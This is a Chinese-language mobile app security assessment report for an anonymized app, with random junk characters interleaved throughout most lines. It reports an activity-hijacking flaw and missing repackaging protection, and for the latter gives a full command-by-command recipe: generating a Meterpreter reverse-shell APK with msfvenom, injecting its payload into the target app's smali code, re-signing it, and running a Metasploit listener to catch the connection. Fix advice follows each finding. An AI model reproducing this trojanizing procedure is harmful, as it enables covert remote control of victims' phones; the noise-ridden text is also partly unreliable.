2 r0 A b8 ~0 @7 k1 I
9 o; E. |1 o& T: |3 h. | l
/ A& R9 U1 s$ G: c# Z 表1-2 测试结果
7 s: {: _ j% I3 ~4 D6 S
/ D+ v' M5 K7 F
8 P- W. l7 o* @; \+ @3 j
! i$ U6 C! f1 ? Z6 z Q
, ^9 j0 n" C( ^ q$ u, d8 {% o5 M! V$ b, Y& a
* t' X) n+ f, m1 W5 f% a5 z
I6 [, Z# Q# u+ F* S1 q) u
7 p" [; t9 Z( ~, x# s- G- B6 m. _: B6 Q6 x* _1 g7 a9 h! y
/ L1 n+ s# y. t* _6 i- E1 L6 V: }- m9 U$ P) ?
2 检测结果
|& f' Y5 p. q, @. D1 o
) R1 r3 `) Z8 t5 M3 J
/ C3 ] g4 M6 ~" k; b
) D" t! C) t- i* R( M7 r
$ u4 b ~( F6 D- a. f1 {8 b# i) [
2.1 某某某 ; i! M3 y) G( }3 N! P2 b
9 |: b/ A9 b" e. T5 D
2 s7 z+ l3 \' S8 y6 q Q* N
7 `- b% X, B" W. p" ]7 _ 5 V) G1 t$ B* K# `4 A+ t
z a+ a {4 k& r
2.1.1检测目标
$ D9 ~0 Y4 s5 c9 d+ D8 I3 w0 s3 z* K1 O: A
5 n( B M$ Q% V* v1 t$ y4 r) ]
6 k k5 [: |$ c& y" Z/ i A, O) p T7 K" b6 ]2 D7 a
7 T7 |! o0 k$ ?$ n6 s- A
目标地址: 某某某某某某APP
" I4 {8 v4 \$ u! q4 q# w/ V' f$ \ A) J) n! e
4 K8 O8 K% Q8 B( o! l
2 q8 k9 e9 X8 g- U
: H* M0 x! h! T5 N; F; l' v
) O! P0 N6 U" V/ u9 b( k6 ]* I 2.1.2检测结果 / ]' P) z7 j- K0 P4 `
4 G# i' q' c9 J
6 w* o! f% H; b& m% I) O. m$ q5 t
6 p& |3 E) E9 y- F9 s3 d6 R& ?
, y. P0 Y8 k# O y. l& ?4 B, Y
6 ^! ^3 A6 n" `* v0 U* \& } 2.1.2.1 7 f, P* n! I. t" U* D$ z
; P2 M7 Y p5 M( g- ^1 g, {
( v. b& v% m: A' _3 s' j% ] I) z. G3 ]
. x) w A+ f9 g6 C/ E. K4 y `
8 N3 _( i& L& X% S( O 漏洞链接地址:某某某某某某APP
- C g H- |( T: P. n) Z& U9 V9 n! w. L
1 h! v! g7 }) @- c& x
7 L2 {* Q& w2 w8 F4 q' w* T c
8 M$ S. p/ Q1 Y2 s9 J/ Q: X& \ c- N4 `8 `, C8 W
# @$ y+ P' O+ G* H2 J! \( c' p5 h
3 m( o, c9 b {
- t6 }% m$ t( p- o
+ `9 q4 x! V2 z
: ]7 @; A* I0 d# z9 Q- ? 漏洞分析及取证: + r9 U. y5 a" g; y
* z/ i9 {$ m9 {5 `9 c( y" y& [
' A3 [+ @5 h0 T( s* |
, p2 B; q4 p( {$ ^
& J7 r6 Y7 e3 Y" \( X* K- X! i; m0 l( i* k# d8 ?8 p( N
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
* Q5 C& e6 R8 T/ _" R$ z3 K; n& ~. c" V8 Y2 B
. m+ J9 p$ y& M6 c( F
3 @) Y. t6 O6 A" u* J+ ^
4 X9 r0 o! V0 |! R, ~7 r
1 c4 J+ ^; Q' ], `. B( O
s+ M' x! [) r8 L _. ?! S8 ]
( u L' I" y h& i; h
V( M6 l/ H2 h9 M. d6 d/ J6 p/ Y5 o$ J* E
0 c; ~4 C) e5 c
5 {" R8 i4 w( L# e * ~7 d, M2 p' F# }
. }& i$ y/ N$ ?0 j, l, }3 @
! c3 R$ j. D. @* {2 ^" ?, N
! y$ E5 _2 V# `$ U& Y- U; M) L 0 v! c$ Q$ Y% _8 `, c9 S5 i
" b( z/ v3 E( F, w
# f1 ~0 `, t+ r! R; b
$ o# }7 c5 O! f2 `
% i2 l1 s: |' }5 D8 E6 E
0 ^% y- X3 c9 K
; W; o4 z6 D9 z6 T
$ V8 S4 f/ u+ }3 A1 W 
0 p8 L1 n& ~* X4 A L% G) ~5 ]) k
5 P0 e" _* n n
/ p# _' s: }3 P/ T5 d, N. v& I$ ^' j0 j8 O4 x& B4 \0 k
* ~6 a! b; P8 q
, j3 r" D2 s- k3 D8 _ 
5 [8 \* e" N' l$ I0 ~) _3 a1 Q1 \9 d
; G* a: u& F; }2 c' x$ }1 j+ r
0 L5 E9 S% @$ }. w' {) t( S3 h- S- G4 ]& i8 e- [- h% i
6 Q) C+ c$ v5 _. E5 {2 V* I+ \
$ G! `, p w/ d0 S 漏洞危害:高
4 f, H! \- ~' G4 v
+ r6 `: d6 o- Y2 w3 k1 b
" h- ?. K' b. B3 ?7 F+ H4 [
, ~# V7 H u! R, y
* @/ W2 a1 O- _6 T. Y {( Q
/ s) c9 w8 S" v) |' X
/ m' A- x/ E& L( A& ^9 b; u" |; A9 K% R; R9 d: W, [
: t7 F0 h- I( o0 ]
7 J7 T+ A$ v5 v# W3 `. ~0 k: P6 k
& S+ u! H. x" r, Y6 _* |9 v; J+ c6 O. t/ m9 {: V* f- f6 L
| 0 B! f: B$ }' s% c9 K4 [. k. q
m3 @0 ^8 ^5 h: ?
/ k" g) K. e2 a, ?; l6 N/ N
" O7 @" C h. i6 X( q) M) A+ e 严重程度
+ X+ Z, P X3 O) D
! S% l. [4 ?' a/ w% l% K
! ~( b3 ?* X3 |! } x6 i `& \# j$ w: a+ f
| & O4 k/ r% G+ _
. x6 L( _ k" s/ H 8 X; M; P4 A1 M a: ]8 w+ u* p# z
* w: D' s6 p0 y' d8 v7 L # n8 q$ i* [1 _
/ D5 A9 x8 M4 s) L8 ?, ] 高
1 j! i, J! f6 c( n K$ |1 I7 [& b4 r* q V* e& g3 t0 J8 I: h
3 h! Z& t, ^. O2 @5 @! b$ a
: b* `& X7 U& {# l0 s" C* ] | 6 p! h6 P$ L/ r
8 w6 n+ Z2 {+ I: ^
+ Y$ Z3 _6 h) K$ P+ d9 e+ U: J) |6 E6 [% o
0 r( a' K) k: P$ K P) b
B* M9 G0 x! i" c, g- ]
■
( O+ Y q1 i% g! U
! q5 W; C, p1 }" {) h
% O. r9 e6 \5 K$ ^' I# d6 I$ u) X7 J4 k, z& f' O
| 1 U$ Y; J4 B" E
7 B& J% w- W, s0 W- H- Y+ N * L) r1 F' J( D9 r. X2 L
: O* P! Z" Z- j. x t# b% F
8 G4 H: u( W4 h* A, }4 O" ~& {. L. [8 F: {
中 % x& o: s. P% W/ o: I, @9 J( _+ a
2 W" n- d4 z: s
3 |' X: m, k9 s' u D6 V# T: `! }
# {7 K3 U" D b9 ?: g! S H- X | ) S1 Y$ c- r% U/ Q0 [5 L$ I
: }/ _' ] _. r4 O2 d
! k* @/ j4 t% t' t( e* F3 ~. }
! Y7 V8 ?- C3 p* M
, C' R6 j' Z+ ]6 B: q
: a: d3 U( {2 E' R
! I0 \9 s! o# b
" J+ D# V# q2 E, `2 @+ G: k4 K& K 3 b1 a( C% a2 g
$ t6 ]! P( U/ R7 c& T7 u" ]
|
$ E; S' }/ Q$ v( j: d( p; h- e3 b- l) d) u h
1 T* H, \) n4 d/ Z! }/ }2 i. C
9 X9 l' K2 s3 s# ]. z4 B# I) Z
0 c ]0 c( u. w
7 I% e, ~' i' j8 S 低 l: F: S- x' k0 w& {* u. R
. V( s' h! W6 u) h# I
% b3 J3 R( [) g9 k6 r0 a
' Q/ W$ c* H+ @* L0 H
|
4 c k9 y0 n2 O: j+ |9 v) H* l- S; i, p
" \' q d m7 x6 B$ R, B0 }6 [# D
$ V# ^" Y' U0 b$ L
, A, k( O( e* P9 W3 a% [- d6 ?
$ M. W9 k3 F( {: y& T 1 u- A2 D `& \# }' ?+ ~+ `1 D
/ f n+ _7 L7 ^" Z6 R% @
+ h- j# o9 C% [
0 Q/ } F. c- e | % t- f8 S+ z$ t2 V/ W# G. | r c3 _
* x$ j7 }! z X1 [4 Q
9 ] e/ N- v' S- d/ j* x8 H2 v
3 _4 N/ a8 D- t& E
0 b) ~& y9 V' r* p
% R% ^( o" N% w) E( }* S
. u4 f! h) m+ }9 j/ q* B2 [1 p, m6 ?
) d8 Y1 v6 s1 G' a$ R
+ _3 O6 I: I+ P5 _) F1 D
5 h* {% Z2 L, I2 L# y - |2 d: Z( g; H$ ?
3 _& D/ Y, F/ m" h
( W& X7 _2 w$ p4 k- Q( k! `
) {) S$ Y1 J+ r) [% [5 b
2 b9 U9 _" ^0 V& C) T# I
, T, N. Z3 j7 ^, G# G5 j 2 X- O( ?. d/ V- \4 [& M4 K8 `2 [
* B) v" W- j0 s7 y, v
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : n6 w* l7 H' i8 b* y3 {" j
- E% Z. n7 q" u9 c) x2 _( T9 | U
& k M8 k: E7 j+ {, K
' F$ |1 j1 B3 F# N2 X5 e8 h1 l5 T7 L 5 \, y1 _: M9 {9 ~! C
# g2 c ^, k9 y3 k" ^
1 w- W% T) q, L: r; c
! Z J, Q. \' A
5 W( _1 ^: P" _. h- B0 y
! f8 l3 ~3 e; i. X 0 [9 I7 ~! S1 z; i7 r
6 z8 C8 J. K% e5 R: S- b" u8 D
" P4 J0 H7 ^3 k) J; Y8 o" I% a# r
: F o1 Z# S' s
$ J4 W2 s" q7 C& \+ @+ V2 R" l; }/ {
1 Q$ O e" f/ S, A& {; G" k- O
! @3 X8 }' z/ Y* H. h# _% S. O
2.1.2.2 ) L$ @, o6 D( B5 R9 H) y
, w4 ]6 ?; g: ~. z) R- M D9 G
^% q1 t2 ^( h8 {) ^
' X; o9 J7 @$ B7 H% ^; R
2 _" q! I8 @! {
! W; C$ V" z" q9 ~6 ?6 A 漏洞链接地址:某某某某某某APP ) a* k) p) O1 b' T" Y, \
% u- k( H$ j6 ]" ~: {
# a- c$ o9 j' [, h+ e9 _, c1 B0 L) }% |* q' s1 G9 @
$ l# ^% K2 R! `& J/ V
0 k& v! F4 Q/ y9 q1 q+ @9 L- y 漏洞分析及取证: ( z3 P, J& C+ A" i( V; c m
: L& I$ r- L7 t: o8 G
8 y8 Z- l5 G2 z7 G* p; l5 n
9 M! B/ ]- m# \
5 Z# m e+ w! w0 ^ `2 Y
. A; [$ c( w; Y 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
* @) S2 P$ X' X4 m% D
+ _: S: d3 |7 X5 T) ^. g2 c
! U; ~$ o2 }. V$ l: w3 m8 b
, Y5 a J+ o" X* G- |: d# V
9 Q7 ^2 A/ C$ d+ i
) I: O9 i7 v0 |7 I" S D. h 用Metasploit 生成木马 apk
4 ]# z* i! ?& j9 d _" J# U6 `( S
1 r+ T- E$ n" [0 T0 B- H' }5 b
! { w7 t) N$ K+ l9 s' X
4 y/ u: |9 h7 Q W$ I2 ^. v' {, @0 P6 E/ D/ h% J& ~7 f
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
/ Y! ~* T- o7 O2 s" y* M: T/ g0 \/ ]* e% @& v) B( O
1 p$ I$ c$ Q$ Y% X2 ?1 L* X7 V2 e8 O1 a
) l& u3 h1 T- B- S* l
], W2 I) M# Z' |% a3 d0 V+ O/ {6 L9 y' n1 E( p- M' G4 n
反编译目标apk和木马apk + C5 m9 L1 _$ Q* b4 J1 j
- A! s6 L! q1 [: S" H8 \
( ?" X' u9 Z5 n2 Z) {
! v: ?" p0 U" a8 Q
5 n5 E) j( x% |6 r V+ i5 @
0 f& v9 c$ O3 X9 ~ apktool d target.apk
, @- X- k$ _. t, o0 |; ]
/ V" O1 L9 } K) V. E apktool d cockhorse.apk 9 N; W3 n* k; T( t( Z. R5 ? Y
7 H0 i" R+ @0 C
/ h4 _4 h1 D' s/ N, z$ }9 x0 F
9 S! A( [! s0 I, q* [ # @) X4 k" N. u$ j# @
1 v) @' ]5 A, F% I1 `
木马 apk 注入目标 apk 7 I7 h& r. ~3 d7 q: c
6 |6 y9 `/ A7 p8 w/ R
, k7 ?1 U, N3 |; T$ W6 _& V) u9 ?
' @8 _- Y v" m U- o ; u+ A6 v8 }, B8 V, s2 _ C) Y
. b9 y, {, f2 v2 X; F/ n, a 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
! _! T* W$ p1 v
* ~) B, ~& y* E8 f. J4 u" ^ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
: Q7 V8 `: Y0 g# `6 L5 {3 K/ F: x& @7 G: b( p- T7 e- f; J
\! ^, C0 V3 z0 x8 S! O ^
8 f0 x6 [0 b; b& n% a
- |! O2 l2 b- C3 ^9 J) Q
8 _8 N) a0 e# A! x9 Q" p6 e# E 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
; Q3 S5 |: q" d, s5 G6 _% d/ ^' a) D t2 W0 g" p: J$ k
+ G; W3 O* M. i: S9 A+ G
) S5 s" k, U. V/ R# A
z5 M8 g& r2 z. x0 E& z; o
- Y( U9 Z% _" c5 z2 O 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 H+ v% J; D5 M& m# R, `
- ?- f; h9 q. D% [
1 \$ G7 P' q8 w. \; N5 \
- N! Y0 f* P' G V 4 j7 W: m! \1 C
" E. @" q! H1 K3 S" |
回编译生成最终 apk
# [, @. t p& m) a' ` p/ L1 S; c0 Q, F4 y; i. \; {
8 }4 y; B4 N; P1 w
' D6 c* D6 g3 ^+ R. P, {! p+ |. {
; T5 n, F- m2 ^9 i8 H) L! s" t8 v+ j6 {. J& _
重新打包
7 Q6 O8 _+ i- p2 x2 f, M6 U3 p* d! M* } F
2 }7 h+ P' d0 |
& X; |/ c$ U6 K" P / r" m+ {6 W; ~: g7 t4 t9 ^
( n- S. g- a; t& l6 W' U. F apktool b -o repackage.apk target_app_floder 2 ?7 s2 _: T7 N5 H; K5 j! u
6 c) U! L: A4 F- k
7 R2 R+ ?; E, H3 l1 O H# K8 R, C) _. `$ L* G
9 P4 l. L: ?+ n! Z0 ]' {
+ B9 k, E: B; b$ h* W4 M3 M; V2 O 创建签名文件,有的话可忽略此步骤 4 K% \4 Q' i7 e; C+ E& i; U
' J( ~, {. e; d- I& y% H% i
6 Z8 m5 z9 |- V6 \) |/ N4 C& V ]$ A% g$ X/ j6 ?
+ q# I0 X$ X+ E ~- H% f
; S6 R4 _) Y3 Y/ D1 W+ p
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
7 g; `9 @- P) v& |3 m8 h
9 k! {2 L f4 c/ s5 v8 e% F
+ G p4 C/ N9 s
8 h% a' \" F+ G$ t ( {6 e8 F' Y+ k/ L& \, B, q
7 G! j4 J' h% W9 y 签名,以下任选其一
: R& b: x# }7 U8 y
! y& D, [, A+ Z3 C. v
P$ A6 B5 l. Q( D# ]
9 [ ^/ A5 X8 I 8 S# o% `" B: T/ ~0 Y
4 L* f9 W7 b" Y! M, H Y7 b, F3 R
jarsigner 方式 / C* d% H7 v& j. F: L$ W$ C* y
, }& u/ e& z/ ?9 ], A1 H
& e6 L1 N0 s/ K
/ O1 ?2 a1 ]/ } 7 O8 s; _9 [6 j- t
7 i; b2 p. i! U1 i
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
$ B$ ]7 p, {* [0 j, U$ i+ e# q) N( C) F( j/ |
- A0 Q+ H# i+ [9 S4 E3 f
; y* p" l2 t3 X/ c% @% d2 m
8 j' k0 N8 R9 l1 z
$ v( `( w4 `/ Z0 {6 \1 U apksigner 方式
- ?3 [2 H* B/ i' v) d) O; e
9 ^% u3 A4 F; ]6 s2 V. q
% m4 c: X1 y3 o$ B- X" f" \
W) i( [5 n4 n* y3 N1 d: {4 E ) c1 r3 k' T9 c, r6 u. w/ M P" k& }' N( r# X
% s, T* g! r5 `0 O
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
/ R4 z) r! n' q3 ^3 _4 @7 b- ?' I8 Y; L8 e: k
6 n; n( Y" j4 d* M& R8 A- A# c" o* r- O3 O1 \; W
6 r" ]6 ^+ T& T; `$ U3 B4 |2 x( K
如需要禁用 v2签名 添加选项--v2-signing-enabled false ) v% m! d9 \% a( b* Q
# k$ s' K) g7 Q# W6 I( E
1 i$ h# |2 {# i W f! z- t
q2 s0 `9 A% S% V" t5 P" r
+ J" N. a1 L' G
* ~$ W* _+ m+ x 验证,以下任选其一 * f5 b- W. o! s+ R# g6 W
4 b+ M9 ]; O! n$ o0 `6 v; U
% ?+ @2 U# M' w5 L( a; O0 {, }
$ H( ]+ B3 m/ z1 Q
# I1 z1 G" ^# R" o. @/ ^% ^6 q/ U4 b5 x' X3 |8 d
jarsigner方式
p/ J# Z8 }4 H/ l* x0 x
0 w* ^# ^- W. ~% ^# L$ ~$ p
1 B7 b$ w9 `( r1 U
, @; \! V3 A y3 h9 I, G+ ]
/ q+ d) f$ ?+ ?0 d; z& X' J+ [7 x) H# R* w
jarsigner -verify repackaged.apk
+ @. z3 X: d6 C( @5 s0 s
) W/ Y5 @/ u0 p
; {4 A% P4 L# g7 K: f" l, @
2 x9 e ?& J$ x( @4 u
7 |1 Z! @) }! E- t' h7 z6 X$ F- o: ~( k: i( [
apksigner 方式 % [" X- ^1 a7 L# E0 r# a
" n8 `6 A5 ? N
2 U* t* M8 T- D H- S- q1 n. D
2 J6 t4 ^0 E! d" w6 | ! f! b. c t, }; b, j( v
7 b' Y; _. q' T' q
apksigner verify -v --print-certs repackaged.apk
. y$ e9 Z, u: a1 E9 h3 {- z' K- F. S( N3 N* i! k9 w q
/ c9 z; d+ F5 m& ^$ W+ Q5 Z( V O2 ?; a$ I4 C! @
) o% s) b. g, l: {5 k7 n
3 |, }7 Z T: u& x8 F7 ]4 H( I keytool方式
8 |% y* i# s. q, J( C* i. j9 C N
. \- i' n( k4 V
6 A- Z+ k' i1 a) a4 u7 q
2 z: N) B3 J W# k6 D0 J7 D$ a% V
. ~ @( w, E; R$ N! }4 D
# ~8 T' i) F, o2 V/ C keytool -printcert -jarfile repackaged.apk % v5 p0 D; E" o, w
. F$ `. Y; Z2 a/ n9 s5 V) M+ B/ R
, H4 z0 T7 U" l
* O0 F0 s9 U% f / ?3 }: W" Q) O4 ]) h9 ~) N
* X: P; d6 u9 f2 | 对齐
9 C" q0 @; K# P& E( ~& h% w2 R; _7 b4 A7 V" t; T
5 y# q8 I6 d w4 C% X! n
, G5 l9 J! w7 s3 U: ~- P# m9 [ * ~8 T& \; H$ d
7 \6 O* M5 i$ T7 K/ k; `: h- n 字节对齐优化
1 }; e# q) n& ]6 Y( n2 ]! `' \6 `! ^5 I$ ]6 N( F! P+ d. u7 A( f
9 Q0 G1 |! G) J8 a/ g" N
1 J& X9 Y3 C3 ~' e, O( d
9 ^/ K+ v! A P8 L# j( M
5 |0 F3 w' `) z" i6 P0 w; o zipalign -v 4 repackaged.apk final.apk $ Q( N @) N' {
; d8 A6 b8 C: v# O7 M
" d% I* q4 n# r+ h- ]2 G4 o1 m- z0 i9 _, R# e2 B6 l) R; X
6 w& z( T# V( k! \( ]" o8 c9 c
3 q* f6 P. F n$ I q 检查是否对齐
H) v( ?2 Q I- s% g, ~
; L' D1 A2 W: Z$ z) s O9 d# R3 L; U( N! M
- E/ W* v" ]! G* q# D; B5 D5 D/ r7 x2 ]* Q9 C- d, J
* @/ V- \1 M: \8 \ U
v( H& m/ H* d f
zipalign -c -v 4 final.apk * t: O$ {1 l5 L7 n: D8 V O
6 V! _7 T( c2 p0 }" w" V
1 T( p7 N4 }0 m0 G0 ~# {4 i! ?5 k
, P2 H3 L% D/ u4 d; }' ?9 e
. ]& w5 `1 s8 j, Q+ R' p# S9 o
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 4 @* _3 b" w! k
$ j7 m4 `% ]+ c) b
@2 D1 X: s ~) s. x
7 r5 F, b5 Z; P+ A
' e% A4 @: Y/ ?- Z# f% z
6 [/ T f+ `) m1 C# ?" V% N$ v 启动Metasploit控制台,配置参数等待上线
0 B/ y+ f' H, w4 u; n! e
4 c% `! p4 `' _+ J3 z5 |
! e$ b" e! l% X# { S# Z9 d5 i: R* v. P+ O2 Q# l. I7 q* c* Y
, A }- z. [% y3 T
" [ m: C K0 s4 v$ c
在终端依次输入如下命令
9 q( C9 X5 P3 v) S& K- A7 t
# h8 S+ l5 ]* @! K$ c/ W3 L
) ~, e- f' C2 x7 @9 x$ K- T8 i7 t7 M- u( m0 H+ J# c* \! j" ^, h V
, G$ I' A; {: V: b: [3 w @ c' Q$ W* `4 ]) w
msfconsole
4 a% F4 ?& K4 |! m& C1 b! v: e7 ~/ e5 \: a
: N! _2 O. _# P
# ]2 D" X. f9 S* ?
/ F4 N2 d3 _6 t0 C$ u, @7 b* X7 U; C
use exploit/multi/handler
/ z0 I. v- i" j8 c# d6 z( h5 ^: @1 p" ?% H" _4 h3 `0 T
S4 J4 y( @& \ N% c: T& p% C3 [4 m
. B& F5 ~9 \, m% u
2 X3 V$ _/ _; R) c+ R+ x
set PAYLOAD android/meterpreter/reverse_tcp & o3 T; j) K' P; I/ D
+ w" g* M! E5 b8 b' N
. _. r7 R$ U$ A9 N% v+ g2 v+ `: P$ l
! f+ Z/ r- G% t M0 s# s2 x& l3 ^3 m; A* X1 ^% I: C
set LHOST 192.xxx.xx.xx $ c9 u) w F7 v" s' J. G
3 M2 ^# L$ M6 p8 c& D& y
* j, Q9 v/ @! m0 C
* B' ]% M5 r; `* a
' a1 m/ I; d! e; j
' W6 x' X% m4 r9 Y6 ?' M set LPORT 4444 ) X, r& E/ T7 w: e, J
4 p# Z0 B7 ^: S& t, Q
8 [$ x: }+ N, |+ }
3 L9 Z8 f0 G' j# q! ~, h3 n
( V6 U" K# @9 _5 v' w
~8 d5 C% N8 ^7 t2 Q0 `/ b exploit
7 w$ }3 X# e( t6 `2 @. b- \
! k9 ^4 ^ A' C
8 O8 `1 y+ w+ f+ R/ R5 m
* e$ i" S4 f3 j/ k; r& ^, F- C 9 b Y3 `' V5 R7 p, q
( i! o9 Y# ?" `0 U" r 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
0 O& t' V1 u: z' f" T/ |' n7 H
5 S5 j" B3 v6 Y' ~- u, P6 O; i* T
4 t% j% @9 M, S9 E* r" a% I6 V; E' [
; l9 N+ p/ D! q6 w4 o' q / P4 z h/ {1 V
; i; ^6 K9 F" {. L% I' l+ G5 H
漏洞危害:中 , b/ |6 j4 x8 U3 \6 L6 v ~
: p* [$ r w* E5 @4 R9 v( A" m9 O
3 L9 ]6 f6 p! |, E& v6 M6 j1 ^- i+ P5 _1 r) \0 T" ^
- Y/ l7 H- v6 ?/ ^4 O* V# l
! w) y' ~ D* u0 O( M
F% G" t$ M. J$ ~, S% M$ D% p& ?+ x2 \$ R6 c% x+ e( z; Z/ Q$ Q
, ~: m$ y( e M2 o
5 s& d3 c$ O9 B8 a 9 L+ i6 s) E$ B* g' ]% g
7 k0 f1 n7 F( Q( D! k7 m: V; p
# l A2 h4 I# y r, @
4 J3 b5 U5 {% V3 J |
6 `/ T% ^) n( f% x g' Y# x5 Y& z5 @& R1 t& q5 A
9 f# M" P- O5 s; o' y. h8 a& J! d
# n8 i6 f4 L" n8 u N% k 严重程度 4 L& Z8 ]5 d( i: N" u7 m
# w( H9 T1 M4 j! q. e
1 U1 m2 P! `9 ~; A- v5 C' S
2 { c- f' Y: S0 ] K0 q# p | ; ]! ? d/ U, T
- F) t/ \# U% [$ Z
7 G! b' ~/ v9 E& d
0 _& h2 s6 j f! B8 v* \
+ }% u) W. q: w9 k8 \& Y
/ P( t! R; l" f1 i* g 高
2 y" w- j' E' |; C7 r" `3 m% o6 D! [* J) A3 ?, V/ D
: T O5 |+ H, P3 y5 ~0 w
, h; M8 _* k9 @8 y. [' i | : t; J8 y2 M$ h$ t4 w/ v
1 i, \. w, M5 X% z' \4 `
& b) W; L& N& K& ], _; P( j* u3 |6 k7 e" i, Q& n5 x
) L6 d- o; b7 g- f! n2 V8 H
+ u+ F, O1 E3 U ■ 3 S0 m* Y% k( [2 y0 N$ ]% P! y% R6 s
% i5 L, p3 m1 o. h7 p
! u# S. M) H% h. N
% r: ^6 V& ~ J6 w% `! T# W6 l: R6 _ |
9 ` U5 j h O3 e5 V! u8 s
# H9 W, D6 Q0 X o; i- i, Z
: d- A" P. i) |. Y/ |: ]8 b3 {, W% d0 ^4 N+ M. }
0 e H; m) W- s: W" M: P3 {+ k' }' O2 _% @- x+ t
中 % _4 h3 p. x. h' i+ `
) D I5 a- q7 m) T6 d9 w # G& x! g' `5 @# s
, [$ w4 n' n3 ^4 t" k Q
|
" z1 f) Y7 I* T% J }
/ H( W7 J+ M/ P8 ?$ n4 N" t
& A+ L7 f% e/ X9 D7 Z3 n4 A, W% [
+ ?3 T; Q& b# U2 W d , Y" U1 b2 e1 T# e; B" C# a
- T+ V) X, R. ^ a2 p: s8 @ # ?5 T" `* g" X. r; R9 \% ?5 K4 B
3 \: A4 p: J: U k' I 3 ^5 u5 K" P3 @
) b8 {0 u% s8 |- d w
/ }( Z& R- A% z) I* I
6 u" A# K' k; s( o |
$ Y! w) I" ~/ ~1 C$ N
0 U* x: m+ L' U* L4 x: z
' q' U5 q, Q. {+ n) \( u2 F$ p# U; `2 _* E6 ]$ O' h
. h" W- `6 T8 ], K8 |# X5 P
& r2 D: t' [$ b2 U 低
: U: P+ [ p- P+ e9 ^5 U+ H2 P& p0 B2 K1 b" ^ p# ]
( n! r9 K! \4 a0 r
, V2 f$ N3 m2 o7 Y4 t( f
|
0 Q! [) K6 ~5 D+ `! b. R! I
1 R# \1 B% H- m6 ] g 1 k6 Y# q5 C, r5 u
$ L( I) A# ?- B
; i9 t! k7 J, k1 C3 ]
& L. \3 o; ?, s+ s
; e% |& h8 [$ X) w1 f. ^ N, M2 u3 |. B2 D# c) I7 W }8 y# w& H
# a/ S/ i8 K- |# N' [. Z+ h/ a
: q4 F; J6 N+ T) ] % d" Q: G: f, t1 c) y
0 T4 J$ k( P$ Y9 ] | ! [! E7 H& k' [0 X, Z `2 j8 C
* \$ `5 v a: Y! [
: d; C3 M9 F2 @" V( Z; |( }) O' C7 N& Y9 v, E) M/ b3 z3 a
: s4 K! A; F5 H. S3 i
3 X( ~; J8 t5 L4 M! R. \2 ^
. A G6 [% o& T J' ]+ m2 l, P+ Q" N
. X# E# x: W9 P, |' U8 q9 f0 W5 f
$ I3 r$ W& o9 ]; P0 h0 M; V, t% G" \; u/ W2 p. J; a
3 W. u; h5 |9 }& i
3 P, G5 h* N6 W+ F7 b
8 H$ Y" P% l( j+ |' s% u
1 l+ C s' B0 t( b
, e' H6 J& X, T! R) B- Q& a1 ?
- [# I- h j! H9 x5 E7 |0 K 修复方法: . U6 M+ ~, w$ G
8 ^8 h# R" H0 u T2 D
% }6 O8 M1 ~3 b: i5 ]5 p3 W/ }* I: t3 |6 y% ^" M
/ N0 @+ ]9 _0 F
6 Q* `- }5 a7 H* l 1.在 APP 启动时应做签名校验防止二次打包。
. A% u2 k0 p8 m6 \
" f+ O. v6 w% }+ G: j0 E4 t 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 1 D# W* {* X' H% t) n9 l
; M/ S) k4 Q2 r' |
; y, x" D) s% s
; d+ L% Z5 p9 Y
8 h% ` p E0 R7 Q8 O" Z/ i" R7 c% L6 r1 Y P- z
/ `1 o2 W* n7 K/ u d& t3 x
8 ?$ p% _" G8 T5 J2 a$ g* H5 h7 M
+ z6 n+ f5 X: b- r- @' l$ Q8 O7 l7 z: C2 f; v' G0 |. h# F
# ~: @: o5 G+ z: \ p0 d' f$ t4 l
W1 N4 Y! O9 v A$ }) _: [3 V( M 0 A, R# r$ v+ S# l( `
4 p+ \- M" r8 E$ R # b" A# X! j% ?
: V& M0 v& p$ F0 w. R. f
5 R! [0 G0 Z/ @3 R
, {, o) {! B/ V- o
4 C% r& q7 i6 F1 u( z
$ q; }- d1 [$ x6 r' N0 S